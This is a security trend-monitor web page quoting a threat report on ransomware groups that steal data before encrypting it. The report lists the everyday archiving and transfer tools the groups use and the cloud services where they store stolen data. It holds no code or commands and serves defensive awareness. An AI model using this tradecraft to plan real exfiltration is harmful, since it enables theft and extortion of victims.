- Home >
- Services >
- Access to Knowledge >
- Trend Monitor >
- Domain of Application >
- Trend snippet: Data theft creates a secondary extortion market
Trends in Security Information
The HSD Trendmonitor is designed to provide access to relevant content on various subjects in the safety and security domain, to identify relevant developments and to connect knowledge and organisations. The safety and security domain encompasses a vast number of subjects. Four relevant taxonomies (type of threat or opportunity, victim, source of threat and domain of application) have been constructed in order to visualize all of these subjects. The taxonomies and related category descriptions have been carefully composed according to other taxonomies, European and international standards and our own expertise.
In order to identify safety and security related trends, relevant reports and HSD news articles are continuously scanned, analysed and classified by hand according to the four taxonomies. This results in a wide array of observations, which we call ‘Trend Snippets’. Multiple Trend Snippets combined can provide insights into safety and security trends. The size of the circles shows the relative weight of the topic, the filters can be used to further select the most relevant content for you. If you have an addition, question or remark, drop us a line at info@securitydelta.nl.
visible on larger screens only
Please expand your browser window.
Or enjoy this interactive application on your desktop or laptop.
Data theft creates a secondary extortion market
essential data was safe. Not only would they hold the machines hostage, but they would steal the data on those machines and threaten to release it to the world if the targets fail to pay a bounty.
Until this year, conventional wisdom among security companies that had any experience at all with ransomware ran quite uniformly: Lock down obvious ingress methods, such as internet-facing RDP ports; keep good offline backups; and deal with infections of small, innocuous malware such as Dridex or Emotet quickly, before they can deliver the killing payload. Several high-profile ransom attacks, for instance, against school districts across the US, failed at least in part because the IT managers had maintained an unaffected backup of critical data. As a countermeasure to their victims’ preparedness, several ransomware families picked up on a side hustle designed to increase pressure on their victims to pay the ransom – even if every backup with essential data was safe. Not only would they hold the machines hostage, but they would steal the data on those machines and threaten to release it to the world if the targets fail to pay a bounty. Over the past half year, Sophos analysts observed that ransomware adversaries have settled on a common (and slowly growing) toolset they use to exfiltrate data from a victim’s network. This toolset of wellknown, legitimate utilities anyone might have won’t be detected by endpoint security products. The list of ransomware families that engage in this practice continues to grow, and now includes Doppelpaymer, REvil, Clop, DarkSide, Netwalker, Ragnar Locker, and Conti, among many others. The attackers operate “leaks” sites, where they publicize what data they’ve stolen; REvil allows anyone to buy the data from them right from its website.
The criminals use the toolset to copy sensitive internal information, compress it into an archive, and transfer it out of the network – and out of reach of the victim. These are some of the tools we’ve seen used, so far: Ì Total Commander (file manager with built-in FTP Client) Ì 7zip (Archive creation software) Ì WinRAR (Archive creation software) Ì psftp (PuTTY’s SFTP client) Ì Windows cURL When it comes to data theft, the attackers are far less picky and exfiltrate entire folders, regardless of the file types that are contained within. (Ransomware typically prioritizes the encryption portion of the attack to key file types and excludes many others.) Size doesn’t matter. They don’t seem to care about the amount of data targeted for exfiltration. Directory structures are unique to each business, and some file types can be compressed better than others. We have seen as little as 5 GB, and as much as 400 GB, of compressed data being stolen from a victim prior to deployment of the ransomware.
The criminals typically send the exfiltrated data to legitimate cloud storage services, which make this activity harder to spot, since these are common, ordinary network traffic destinations. For attackers, the following three cloud storage services have been the most popular go-to for storing exfiltrated data: Ì Google Drive Ì Amazon S3 (Simple Storage Service) Ì Mega.nz Ì Private FTP servers In a final act of destruction, ransomware attackers increasingly hunt for the local servers that contain backups of critical data; when found, they delete (or independently encrypt) these backups just before the network-wide encryption attack. It’s more important than ever to store a backup of key data offline. If they can find it, the ransomware criminals will destroy it